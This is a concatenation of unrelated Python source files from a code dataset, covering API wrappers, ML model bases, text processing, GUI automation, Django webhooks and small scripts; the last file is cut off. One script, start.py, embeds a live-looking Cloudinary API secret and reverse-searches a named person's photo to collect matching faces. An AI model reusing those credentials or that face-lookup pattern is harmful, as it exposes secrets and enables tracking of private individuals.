64:\n _0x59b81a = str(_0x59b81a) + chr(_0x2c0540)\n if _0x3b6833 != 64:\n _0x59b81a = str(_0x59b81a) + chr(_0x5a46ef)\n \n return _0x59b81a\n \n \n def test(self):\n return [\n {\n 'url': 'https://streamango.com/f/oeqdlsfnmfdrosts',\n 'md5': '6979519b6e0db1a711534dabfa2d83f6'\n },{\n 'url': 'https://streamango.com/f/brksptcotmdqbesk',\n 'md5': 'b6395b071fd9fb521addae65f5018a3e'\n },{\n 'url': 'https://streamango.com/f/tepsbbepqlapeotl',\n 'md5': '355174b0adabacd21628092903698a60'\n },{\n 'url': 'https://streamango.com/f/omftlnfnklrdttpq',\n 'md5': '97697ab876dc811471afd9123fe1fd04'\n },{\n 'url': 'https://streamango.com/f/ctadtblaqknqctdk',\n 'md5': '9323f9866cf7e39ea887b36f762595e8'\n }]","sub_path":"extractors/streamango_strm.py","file_name":"streamango_strm.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494751487","text":"\"\"\"ContactTag resource for ActiveCampaign\"\"\"\n\nimport typing\nfrom ..base_resource import Resource\n\n\nclass ContactTag(Resource):\n \"\"\"\n Tag for a contact in ActiveCampaign. 
Allows you to:\n    - Add a tag to a contact\n    - Remove a tag from a contact.\n\n    Check docs in:\n    https://developers.activecampaign.com/reference#contact-tags\n    \"\"\"\n\n    def __init__(\n        self,\n        tag: typing.Optional[int],\n        contact: typing.Optional[int],\n        **kwargs: typing.Dict,\n    ) -> None:\n        \"\"\"Initialize the contact tag.\n\n        Args:\n            tag: The id of the tag.\n            contact: The id of the contact.\n        \"\"\"\n        super().__init__(**kwargs)\n        self.tag = tag\n        self.contact = contact\n\n    @staticmethod\n    def resource_name() -> str:\n        \"\"\"Get the name of the API resource.\n\n        Returns:\n            The name of the resource\n        \"\"\"\n        return \"contactTags\"\n\n    @staticmethod\n    def map_field_name_to_attribute() -> typing.Dict:\n        \"\"\"Map field names to attributes.\"\"\"\n        return {\n            \"tag\": \"tag\",\n            \"contact\": \"contact\",\n        }\n\n    @classmethod\n    def all_in_contact(cls, contact_id: int):\n        \"\"\"Get all ContactTags associated to the contact with that id\"\"\"\n        for contact_tag in cls.get_all_in(\"contacts\", contact_id):\n            yield contact_tag\n","sub_path":"active_campaign_api/resources/contact_tag.py","file_name":"contact_tag.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"574329185","text":"import re\nimport jieba\ndef clean_symbols(text):\n    \"\"\"\n    Do some cleanup of special symbols; this part is already written. If you are\n    not happy with it you may rewrite it yourself (it is not graded).\n    \"\"\"\n    text = re.sub('[!!]+', \"!\", text)\n    text = re.sub('[??]+', \"?\", text)\n    text = re.sub(\"[a-zA-Z#$%&\\'()*+,-./:;:<=>@,。★、…【】《》“”‘’[\\\\]^_`{|}~]+\", \" OOV \", text)\n    # change all digit sequences into ' NUM '\n    text = re.sub('\\d+(\\.\\d+)*', ' NUM ', text)\n    return re.sub(\"\\s+\", \" \", text)\n\nss = 'adafasw12314.12333egrdf5236qew'\nnum = re.findall('\\d+',ss)\nprint(num)\n\nss = re.sub('\\d+(\\.\\d+)*', ' NUM ', ss)\nprint(ss)\n\ntext = '请问这机不是有个遥控器的吗?'\ntext = clean_symbols(text)\nprint(text)\n\ntokens = [x for x in jieba.cut(text, cut_all = False)]\nprint(tokens)\nsentence = [\" \".join(tokens)]\nprint(sentence)\n\ntext = \"\"\"我是一条天狗呀!\n    我把月来吞了,\n    我把日来吞了,\n    我把一切的星球来吞了,\n    我把全宇宙来吞了。\n    我便是我了!\"\"\"\nsentences = text.split()\nsent_words = [list(jieba.cut(sent0)) for sent0 in sentences]\ndocument = [\" \".join(sent0) for sent0 in sent_words]\nprint(document)\n\n","sub_path":"Chapter10/textProcessing.py","file_name":"textProcessing.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"336642755","text":"import abc\nfrom typing import Tuple, Union\n\nimport numpy as np\n\nfrom ray.rllib.core.models.base import (\n    Model,\n    ModelConfig,\n    _raise_not_decorated_exception,\n)\nfrom ray.rllib.core.models.specs.checker import (\n    is_input_decorated,\n    is_output_decorated,\n    check_input_specs,\n    check_output_specs,\n)\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.utils.framework import try_import_torch\nfrom ray.rllib.utils.nested_dict import NestedDict\nfrom ray.rllib.utils.typing import TensorType\n\ntorch, nn = try_import_torch()\n\n\nclass TorchModel(nn.Module, Model, abc.ABC):\n    \"\"\"Base class for RLlib's PyTorch models.\n\n    This class defines the interface for RLlib's PyTorch models and checks\n    whether inputs and outputs of forward are checked with `check_input_specs()` and\n    `check_output_specs()` respectively.\n\n    Example usage for a single Flattening layer:\n\n    .. 
testcode::\n\n from ray.rllib.core.models.torch.base import TorchModel\n from ray.rllib.core.models.base import ModelConfig\n import torch\n\n class FlattenModelConfig(ModelConfig):\n def build(self, framework: str):\n assert framework == \"torch\"\n return TorchFlattenModel(self)\n\n class TorchFlattenModel(TorchModel):\n def __init__(self, config):\n TorchModel.__init__(self, config)\n self.flatten_layer = torch.nn.Flatten()\n\n def _forward(self, inputs, **kwargs):\n return self.flatten_layer(inputs)\n\n model = FlattenModelConfig().build(\"torch\")\n inputs = torch.Tensor([[[1, 2]]])\n print(model(inputs))\n\n .. testoutput::\n\n tensor([[1., 2.]])\n\n \"\"\"\n\n def __init__(self, config: ModelConfig):\n \"\"\"Initialized a TorchModel.\n\n Args:\n config: The ModelConfig to use.\n \"\"\"\n nn.Module.__init__(self)\n Model.__init__(self, config)\n\n # Raise errors if forward method is not decorated to check specs.\n if not is_input_decorated(self.forward):\n _raise_not_decorated_exception(type(self).__name__ + \".forward()\", \"input\")\n if not is_output_decorated(self.forward):\n _raise_not_decorated_exception(type(self).__name__ + \".forward()\", \"output\")\n\n @check_input_specs(\"input_specs\")\n @check_output_specs(\"output_specs\")\n def forward(\n self, inputs: Union[NestedDict, TensorType], **kwargs\n ) -> Union[NestedDict, TensorType]:\n \"\"\"Returns the output of this model for the given input.\n\n This method only makes sure that we have a spec-checked _forward() method.\n\n Args:\n inputs: The input tensors.\n **kwargs: Forward compatibility kwargs.\n\n Returns:\n NestedDict: The output tensors.\n \"\"\"\n return self._forward(inputs, **kwargs)\n\n @override(Model)\n def get_num_parameters(self) -> Tuple[int, int]:\n num_all_params = sum(int(np.prod(p.size())) for p in self.parameters())\n trainable_params = filter(lambda p: p.requires_grad, self.parameters())\n num_trainable_params = sum(int(np.prod(p.size())) for p in trainable_params)\n return (\n num_trainable_params,\n num_all_params - num_trainable_params,\n )\n\n @override(Model)\n def _set_to_dummy_weights(self, value_sequence=(-0.02, -0.01, 0.01, 0.02)):\n trainable_weights = [p for p in self.parameters() if p.requires_grad]\n non_trainable_weights = [p for p in self.parameters() if not p.requires_grad]\n for i, w in enumerate(trainable_weights + non_trainable_weights):\n fill_val = value_sequence[i % len(value_sequence)]\n with torch.no_grad():\n w.fill_(fill_val)\n","sub_path":"rllib/core/models/torch/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"620468721","text":"import os\nimport re\nimport cv2\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import unquote\nimport cloudinary.uploader\nimport urllib.request\nimport numpy as np\n\n\nfilename = \"arapova.jpg\"\n\n\n\nglobal imgs\nimgs = []\n\nhi = 0\nwi = 0\nbb = 0\ncloudinary.config(\n cloud_name = 'dnevycmvy', \n api_key = '561873719248581', \n api_secret = '6WprD1-g9yjnZON65Eh9sqTz7so' \n)\n\ndef mouse_press(event, x, y, flags, param):\n if event == cv2.EVENT_LBUTTONDOWN:\n os.startfile(imgs[param])\n print(imgs[param])\n\narap = cloudinary.uploader.upload(filename)['secure_url']\n#arap = \"https://res.cloudinary.com/dnevycmvy/image/upload/v1622811323/fdq08sd5sord9qxdxrgz.jpg\" #del\nurl = r'https://yandex.ru/images/search?source=collections&rpt=imageview&url={}'.format(arap)\n\nsoup = 
BeautifulSoup(requests.get(url).text, 'lxml')\nsimilar = soup.find_all('li', class_='cbir-similar__thumb')\n\nfor i in similar:\n out = f\"https://yandex.ru{i.find('a').get('href')}\\n\"\n imgs.append(unquote(out))\n\n\nfor a in range(0, len(imgs)):\n\n r = re.search(r'(?<=&img_url\\=).*?(?=&rpt\\=)', imgs[a])[0]\n try:\n req = urllib.request.urlopen(r)\n arr = np.asarray(bytearray(req.read()), dtype=np.uint8)\n except Exception as e:\n print(e)\n n = cv2.imdecode(arr, -1)\n gray = cv2.cvtColor(n, cv2.COLOR_BGR2GRAY)\n face_cascade = cv2.CascadeClassifier('dev/haarcascade_frontalface_alt2.xml')\n faces = face_cascade.detectMultiScale(gray, 1.1, 4)\n\n for (x, y, w, h) in faces:\n try:\n faces = n[y:y + h + 90, x:x + w + 90]\n except Exception as e:\n print(str(e))\n \n \n cv2.namedWindow(str(a), cv2.WINDOW_NORMAL)\n cv2.resizeWindow(str(a), 300,300)\n cv2.setMouseCallback(str(a), mouse_press, a)\n try:\n \n if (bb+1) % 11 != 0:\n cv2.moveWindow(str(a), hi + (300 * bb),wi)\n cv2.imshow(str(a), faces)\n bb = bb + 1\n else:\n wi = wi + 330\n cv2.moveWindow(str(a), hi + (300 * 0),wi)\n cv2.imshow(str(a), faces)\n bb = 1\n except Exception as e:\n if (bb+1) % 11 != 0:\n cv2.moveWindow(str(a), hi + (300 * bb),wi)\n bb = bb + 1\n else:\n cv2.moveWindow(str(a), hi + (300 * 0),wi)\n bb = 1\n\n\nwhile(1):\n key = cv2.waitKey(20) & 0xFF\n if key == ord('\\r'):\n print(\"enter\")\n elif key == 32:\n print(\"space\")\n elif key == ord('\\t'):\n print(\"tab\")\n elif key == 27:\n break\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38697162","text":"#from pymouse import PyMouse\nfrom time import sleep\n\nfrom AppKit import NSEvent\nfrom Quartz.CoreGraphics import CGEventCreateMouseEvent\nfrom Quartz.CoreGraphics import CGEventPost\nfrom Quartz.CoreGraphics import kCGEventMouseMoved\nfrom Quartz.CoreGraphics import kCGEventLeftMouseDown\nfrom Quartz.CoreGraphics import kCGEventLeftMouseDown\nfrom Quartz.CoreGraphics import kCGEventLeftMouseUp\nfrom Quartz.CoreGraphics import kCGMouseButtonLeft\nfrom Quartz.CoreGraphics import kCGHIDEventTap\nfrom Quartz.CoreGraphics import CGDisplayPixelsHigh\n\nfrom time import sleep\n#import os\nimport webbrowser\nimport subprocess\n\ndef mouseEvent(type, posx, posy):\n theEvent = CGEventCreateMouseEvent(\n None, \n type, \n (posx,posy), \n kCGMouseButtonLeft)\n CGEventPost(kCGHIDEventTap, theEvent)\n\ndef mousemove(posx,posy):\n mouseEvent(kCGEventMouseMoved, posx,posy);\n\ndef mouseclick():\n\t\tx,y = position()\n # uncomment this line if you want to force the mouse \n # to MOVE to the click location first (I found it was not necessary).\n #mouseEvent(kCGEventMouseMoved, posx,posy);\n\t\tmouseEvent(kCGEventLeftMouseDown, x,y);\n\t\tmouseEvent(kCGEventLeftMouseUp, x,y);\n\ndef position():\n loc = NSEvent.mouseLocation()\n return loc.x, CGDisplayPixelsHigh(0) - loc.y\n\n\nsleep_time = .00025\n\ndef sign(number):\n\tif number>0:\n\t\treturn 1\n\telif number == 0:\n\t\treturn 0\n\telse:\n\t\treturn -1\n\n#bresenham's line algorithm\ndef move_the_mouse(x1,y1):\n #m = PyMouse()\n\n x1 = int(x1)\n y1 = int(y1)\n\n pos = position()\n x0 = int(pos[0])\n y0=int(pos[1])\n\n if x1 == x0:\n \tif y1 > y0:\n \t\titerr = range(y0,y1)\n \telse:\n \t\titerr = reversed(range(y1,y0))\n \tfor y in iterr:\n \t\tmousemove(x0,y)\n \t\tsleep(sleep_time)\n\n else:\n\n\t error = 0\n\t deltax = float(x1 - x0)\n\t deltay = float(y1 - y0)\n\t slope = 
abs(deltay / deltax)\n\n\t cury = y0\n\n\t if x1 > x0:\n\t \titerr = range(x0,x1)\n\t else:\n\t \titerr = reversed(range(x1,x0))\n\n\t for x in iterr:\n\t \tmousemove(x,cury)\n\t \tsleep(sleep_time)\n\t \terror += slope\n\t \twhile error >= .5:\n\t \t\tmousemove(x,cury)\n\t \t\tsleep(sleep_time)\n\t \t\tcury += sign(y1-y0)\n\t \t\terror -= 1\n\nchange_space = '''\nosascript -e 'tell application \"System Events\" to key code 124 using control down'\n'''\ncommand_i = '''\nosascript -e 'tell application \"System Events\" to key code 34 using command down'\n'''\n\nsubprocess.call(change_space,shell=True)\n\nnum_photos = 221\n\nfor i in range(num_photos):\n\tsleep(1)\n\tsubprocess.call(command_i,shell=True)\n\tsleep(1.5)\n\tmove_the_mouse(715,38)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(1292,320)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(1387,708)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(459,316)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(670,180)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(1050,560)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(144,10)\n\tmouseclick()\n\tsleep(1.5)\n\tmove_the_mouse(1376,241)\n\tmouseclick()","sub_path":"seniorphotograb.py","file_name":"seniorphotograb.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"350287001","text":"from path import Path\n\ndef check_dir(file_name):\n this = Path(\".\")\n print(this.abspath())\n if file_name not in this.files():\n myglob = this.glob(\"*/**/{}\".format(file_name))\n myfile = myglob[0]\n myfolder = myfile.parent\n myfolder.chdir()\n\nmytimers = {}\n\ndef mytimer(name, seconds, dt, first=True):\n global mytimers\n if name in mytimers.keys():\n if mytimers[name] < dt:\n mytimers[name] = dt + seconds\n return True\n else:\n return False\n else:\n mytimers[name] = dt + seconds\n if first:\n return True\n else:\n return False\n\ndef remove_timer(name):\n if name in mytimers.keys():\n mytimers.pop(name, None)\n\n\ndef tuple_add(t1, t2):\n return (t1[0] + t2[0], t1[1] + t2[1])\n\ndef tuple_sub(t1, t2):\n return (t1[0] - t2[0], t1[1] - t2[1])\n\ndef tuple_mult(t1, n):\n return (t1[0]*n, t1[1]*n)\n\ndef tuple_div(t1, n):\n return (t1[0]/n, t1[1]/n)\n\ndef extract_images(filename, out_folder, group_name=\"mapfile\"):\n from PIL import Image\n im = Image.open(filename)\n size = im.size\n b = 64\n x_size = int(size[0]/b)\n y_size = int(size[1]/b)\n num = 1\n for y in xrange(y_size):\n for x in xrange(x_size):\n l = x*b\n u = y*b\n r = l+b\n d = u+b\n a = im.crop((l,u,r,d))\n a.save(\"{}{}{}.png\".format(out_folder, group_name, num))\n num += 1\n\n\n\nif __name__ == \"__main__\":\n extract_images(\"./img/magecity_64p.png\", \"./tiles/sheet_images/\")\n","sub_path":"Games/Simple-RPG/myfuncs.py","file_name":"myfuncs.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"512656458","text":"from __future__ import division\nimport openpyxl\n\n# new workbook\nresultBook = openpyxl.Workbook()\ndest_filename = 'resultSet.xlsx'\nsheetResult = resultBook.active\nsheetResult.title = \"results\"\nsheetResult = resultBook.get_sheet_by_name(\"results\")\n\n# retrieve data set\nbook = openpyxl.load_workbook('dataset.xlsx')\n\nsheetNames = book.get_sheet_names()\ntoHeader = book.get_sheet_by_name(sheetNames[1])\n\n# creating header line\na = []\nfor row in toHeader['A2':'A11']:\n for cell in row:\n a.append(cell.value)\n# print 
a\nh = []\nfor row in toHeader['H1':'H14']:\n for cell in row:\n h.append(cell.value)\n# print h\n\nh_line = 1\nd_line = h_line + 1\nfor row in sheetResult['A' + str(h_line):'J' + str(h_line)]:\n index = 0\n for cell in row:\n cell.value = a[index]\n index = index + 1\n\nfor row in sheetResult['K' + str(h_line):'T' + str(h_line)]:\n index = 0\n for cell in row:\n cell.value = a[index] + '_angle'\n index = index + 1\n\nfor row in sheetResult['U' + str(h_line):'AC' + str(h_line)]:\n index = 1\n for cell in row:\n cell.value = a[index] + '_bala'\n index = index + 1\n\nfor row in sheetResult['AD' + str(h_line):'AQ' + str(h_line)]:\n index = 0\n for cell in row:\n cell.value = h[index]\n index = index + 1\n\n\n# data lines creation\nd_line = 2\nfor sheet in book.worksheets:\n a = []\n for row in sheet['A2':'A11']:\n for cell in row:\n a.append(cell.value)\n # print a\n b = []\n for row in sheet['B2':'B11']:\n for cell in row:\n b.append(cell.value)\n # print b\n c = []\n for row in sheet['C2':'C11']:\n for cell in row:\n c.append(cell.value)\n # print c\n d = []\n for row in sheet['D2':'D11']:\n for cell in row:\n d.append(cell.value)\n # print d\n e = []\n for row in sheet['E2':'E11']:\n for cell in row:\n e.append(cell.value)\n # print e\n f = []\n for row in sheet['F2':'F11']:\n for cell in row:\n f.append(cell.value)\n # print f\n h = []\n for row in sheet['H1':'H14']:\n for cell in row:\n h.append(cell.value)\n # print h\n i = []\n for row in sheet['I1':'I14']:\n for cell in row:\n i.append(cell.value)\n # print i\n\n # creating data line\n for row in sheetResult['A' + str(d_line):'J' + str(d_line)]:\n index = 0\n for cell in row:\n cell.value = b[index]\n index = index + 1\n\n for row in sheetResult['K' + str(d_line):'T' + str(d_line)]:\n index = 0\n for cell in row:\n cell.value = (c[index] * 60 + d[index]) / 60\n index = index + 1\n\n for row in sheetResult['U' + str(d_line):'AC' + str(d_line)]:\n index = 1\n for cell in row:\n cell.value = f[index]\n index = index + 1\n\n for row in sheetResult['AD' + str(d_line):'AQ' + str(d_line)]:\n index = 0\n for cell in row:\n cell.value = i[index]\n index = index + 1\n d_line = d_line + 1\n\nresultBook.save(dest_filename)\n# book.save('test.xlsx')\n\nprint(\"Completed: filename - \"+dest_filename)\n","sub_path":"src/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"529741508","text":"import Demo_pb2\n\nsensors_record = Demo_pb2.txRoadSensorsRecord()\nroadsensors = Demo_pb2.txRoadSensors()\nroadsensors.start_timestamp = 930\nroadsensors.end_timestamp = 1000\n\nsensor_1=roadsensors.sensor.add()\nsensor_1.flow=2222\nsensor_1=roadsensors.sensor.add()\nsensor_1.flow=2224\n\nsensors_record.sensors[1].CopyFrom(roadsensors) #实例roadsensors作为值\nsensors_record.sensors[2].CopyFrom(roadsensors)\nprint(sensors_record)\n\n\n\n\n# #序列化\n# serializeToString = sensors_record.SerializeToString()\n# print(serializeToString,type(serializeToString))\n\n\n# # 反序列化\n# sensors_record.ParseFromString(serializeToString)\n\n# for key in sensors_record.sensors:\n# print(key,sensors_record.sensors[key])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"308176048","text":"import random\n\n\ndef test_randrange():\n print('=== test_randrange ===')\n s = ''\n for i in range(100):\n s += '{} 
'.format(random.randrange(5))\n print(s)\n\n s = ''\n for i in range(100):\n s += '{} '.format(random.randrange(start=1, stop=3, step=1))\n print(s)\n\n\ndef test_sample():\n print('=== test_sample ===')\n l = range(1, 5)\n s = ''\n for i in range(100):\n s += '{} '.format(random.sample(l, 2))\n print(s)\n\n\ndef test_random():\n print('=== test_random ===')\n s = ''\n for i in range(100):\n s += '{} '.format(random.random())\n print(s)\n\n\ndef test_uniform():\n print('=== test_uniform ===')\n s = ''\n for i in range(100):\n s += '{} '.format(random.uniform(1.0, 1.2))\n print(s)\n\n\ndef test_randint():\n print('=== test_randint ===')\n s = ''\n for i in range(100):\n s += '{} '.format(random.randint(1, 4))\n print(s)\n\n\ndef main():\n random.seed(1) # test seed\n\n test_randrange()\n test_sample()\n test_random()\n test_uniform()\n test_randint()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"builtin_packages/random_sp/random_sp.py","file_name":"random_sp.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"515618584","text":"import pandas as pd\nfrom datetime import datetime, timedelta, date, time\n\nfrom Utils.logger import Logger\nfrom Utils.graph_builder import GraphBuilder\nfrom google_trends import GoogleTrends\n\nfrom Models.graph_line import GraphLine\n\nimport logging\nfrom pytrends.request import TrendReq\n\n\ndef main():\n\n now = datetime.now()\n execution_timestamp = now.strftime(\"%d-%m-%Y %H-%M\")\n\n logging.basicConfig(filename='google_trends ' + execution_timestamp + '.log', level=logging.INFO)\n logger = logging.getLogger(\"main\")\n\n pytrend = TrendReq(hl='en-US', tz=360)\n google_trends = GoogleTrends(pytrend, verbose=True)\n graph_builder = GraphBuilder()\n\n start = \"2017-01-01\" #\"2020-01-01\"\n end = \"2019-11-23\" #\"2021-05-01\"\n\n # Getting all keywords:\n # df = pd.read_csv('search_df.csv')\n\n d = {'ticker': [\"iPhone\"], 'keyword': [\"iPhone\"]}\n df = pd.DataFrame(data=d)\n\n # Processing every keyword separately\n for index, row in df.iterrows():\n\n ticker = row['ticker']\n keyword = row['keyword']\n\n logger.info(\"Processing Ticker: \" + ticker + \" Keyword: \" + keyword)\n overlapped_daily_data = google_trends.get_overlapped_daily_trend_data(keyword=keyword, start=start, end=end)\n original_daily_data = google_trends.get_original_daily_trend_data(keyword=keyword, start=start, end=end)\n logger.info(\"Finished processing...\")\n\n filename = ticker + \" \" + execution_timestamp + \".csv\"\n # daily_fetched_data.to_csv(filename)\n\n overlapped_daily_line = GraphLine(overlapped_daily_data[keyword], \"overlapped daily\")\n original_daily_line = GraphLine(original_daily_data[keyword], \"original daily\")\n overlap_line = GraphLine(overlapped_daily_data['overlap'], 'overlap')\n\n # Build chart - Way 1\n # overlapped_daily_data.plot()\n\n # Build chart - Way 2\n lines = [overlapped_daily_line, original_daily_line, overlap_line]\n graph_builder.build(lines, \"dates\", \"Relative Search Trends\", title=\"Daily Google Trends for keyword: \" + keyword + \" \" + start + \" \" + end)\n\n logger.info(\"Build graph for : \" + ticker + \" Keyword: \" + keyword)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"649861496","text":"import numpy as np\nfrom .. 
import differentiable_renderer_cython\nimport torch\nimport copy\nfrom ..differentiable_renderer import Scene3D\n\n\nclass TorchDifferentiableRenderer2DFunc(torch.autograd.Function):\n @staticmethod\n def forward(ctx, ij, colors, scene):\n nbColorChanels = colors.shape[1]\n Abuffer = np.empty((scene.image_H, scene.image_W, nbColorChanels))\n Zbuffer = np.empty((scene.image_H, scene.image_W))\n ctx.scene = scene\n scene.ij = (\n ij.detach().numpy()\n ) # should automatically detached according to https://pytorch.org/docs/master/notes/extending.html\n scene.colors = colors.detach().numpy()\n differentiable_renderer_cython.renderScene(scene, 1, Abuffer, Zbuffer)\n ctx.save_for_backward(ij, colors)\n ctx.Abuffer = (\n Abuffer.copy()\n ) # making a copy to keep the antializaed image for visualization , could be optional\n ctx.Zbuffer = Zbuffer\n return torch.as_tensor(Abuffer)\n\n @staticmethod\n def backward(ctx, Abuffer_b):\n scene = ctx.scene\n scene.uv_b = np.zeros(scene.uv.shape)\n scene.ij_b = np.zeros(scene.ij.shape)\n scene.shade_b = np.zeros(scene.shade.shape)\n scene.colors_b = np.zeros(scene.colors.shape)\n scene.texture_b = np.zeros(scene.texture.shape)\n differentiable_renderer_cython.renderSceneB(\n scene, 1, ctx.Abuffer, ctx.Zbuffer, Abuffer_b.numpy()\n )\n return torch.as_tensor(scene.ij_b), torch.as_tensor(scene.colors_b), None\n\n\nTorchDifferentiableRender2D = TorchDifferentiableRenderer2DFunc.apply\n\n\nclass Scene3DPytorch(Scene3D):\n def __init__(self):\n super().__init__()\n\n def setLight(self, ligthDirectional, ambiantLight):\n if not (isinstance(ligthDirectional, torch.Tensor)):\n ligthDirectional = torch.tensor(ligthDirectional)\n self.ligthDirectional = ligthDirectional\n self.ambiantLight = ambiantLight\n\n def _cameraProject(self, cameraMatrix, P3D):\n assert isinstance(P3D, torch.Tensor)\n r = torch.cat(\n (P3D, torch.ones((P3D.shape[0], 1), dtype=torch.double)), dim=1\n ).mm(torch.tensor(cameraMatrix.T))\n depths = r[:, 2]\n P2D = r[:, :2] / depths[:, None]\n return P2D, depths\n\n def _computeVerticesColorsWithIllumination(self):\n verticesLuminosity = (\n torch.relu(\n -torch.sum(self.mesh.vertexNormals * self.ligthDirectional, dim=1)\n )\n + self.ambiantLight\n )\n return self.mesh.verticesColors * verticesLuminosity[:, None]\n\n def _render2D(self, ij, colors):\n self.depths = self.depths.detach()\n return TorchDifferentiableRender2D(ij, colors, self)\n","sub_path":"DEODR/pytorch/differentiable_renderer_pytorch.py","file_name":"differentiable_renderer_pytorch.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"93241924","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render\nimport json\n\n# Create your views here.\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom webhook.base.forms import RelatorioForm\nfrom webhook.manager.models import Account\nfrom webhook.base.resources.tools import *\nfrom webhook.manager.scripts.update_data import DataManager\n\n\n@csrf_exempt\ndef playlogs(request):\n data = None\n if request.method == 'POST':\n content = bytes_to_dict(request.body)\n data_response = json.dumps(content, indent=2)\n print(content)\n file = download_gz(content['url'])\n data = process_file(file)\n if data:\n name_account = name_of_account(content['url'])\n try:\n conta = 
Account.objects.get(name__contains=name_account.split('-')[0].capitalize())\n                records = insert_records(conta, data)\n            except Exception as e:\n                print('Error: ', e)\n        return HttpResponse(f\"'{records} playlogs inseridos com sucesso!'
\")\n else:\n return render(request, 'base/playlogs.html', context={'contas': Account.objects.all(),\n 'no_info': {\n 'conta': name_of_account(\n content['url']).capitalize(),\n 'interval_date': f\"{content['filter']['startDate']} - {content['filter']['endDate']}\",\n 'interval_time': f\"{content['filter']['startTime']} - {content['filter']['endTime']}\",\n 'players': content['filter']['playerId'],\n 'medias': content['filter']['mediaId']\n }\n }\n )\n return render(request, 'base/playlogs.html', context={'contas': Account.objects.all(), })\n\n\n@login_required\n@csrf_exempt\ndef solicitar_relatorio(request):\n if request.method == 'POST':\n form = RelatorioForm(request.POST)\n if form.is_valid():\n slug_conta = (form.cleaned_data['conta'])\n startdate = str(form.cleaned_data['startdate'])\n enddate = str(form.cleaned_data['enddate'])\n conta = Account.objects.get(slug=slug_conta)\n account = DataManager(conta.token)\n params = dict(type='detailed', webhook=request.build_absolute_uri(reverse('base:playlogs')),\n filter={'startDate': startdate, 'endDate': enddate,\n 'startTime': '00:00:00', 'endTime': '23:59:59',\n 'mediaId': [], 'playerId': [], 'sort': -1})\n resp_post = account.post_report(params)\n if resp_post.status_code != 200:\n res = json.loads(resp_post.text)\n messages.error(request, res['details']['report'][0])\n return HttpResponseRedirect(reverse('base:solicitar_relatorio'))\n else:\n messages.success(request,\n f\"Relatório solicitado com sucesso.
Ver Playlogs\")\n return HttpResponseRedirect(reverse('base:solicitar_relatorio'))\n else:\n ctx = {'contas': Account.objects.all(), 'form': form}\n return render(request, 'base/solicitar_relatorio.html', ctx, status=400)\n\n\n else:\n form = RelatorioForm()\n ctx = {'contas': Account.objects.all(), 'form': form}\n return render(request, 'base/solicitar_relatorio.html', ctx)\n","sub_path":"webhook/base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"32520139","text":"import sys\nimport pygame\nfrom bullet import Bullet\nfrom alien import Alien\n\n\ndef check_keydown_events(event,ai_settings,screen, ship,bullets):\n \"\"\"响应按键\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n ship.moving_left = True\n elif event.key == pygame.K_SPACE:\n fire_bullet(ai_settings,screen,ship,bullets)\n # elif event.key == pygame.k_w:\n # sys.exit()\n\ndef fire_bullet(ai_settings,screen,ship,bullets):\n \"\"\"如果还没达到限制,就发射一颗子弹\"\"\"\n if len(bullets) < ai_settings.bullets_allowed:\n new_bullet = Bullet(ai_settings,screen,ship)\n bullets.add(new_bullet)\n\n # 创建一颗子弹,并将其加入到编组bullets中\n #if len(bullets) < ai_settings.bullets_allowed:\n #new_bullet = Bullet(ai_settings,screen,ship)\n #bullets.add(new_bullet)\n\n\ndef check_keyup_events(event, ship):\n \"\"\"响应松开\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n ship.moving_left = False\n\n\ndef check_events(ai_settings,screen,ship,bullets):\n # 监听键盘鼠标\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n\n check_keydown_events(event,ai_settings,screen,ship,bullets)\n\n elif event.type == pygame.KEYUP:\n 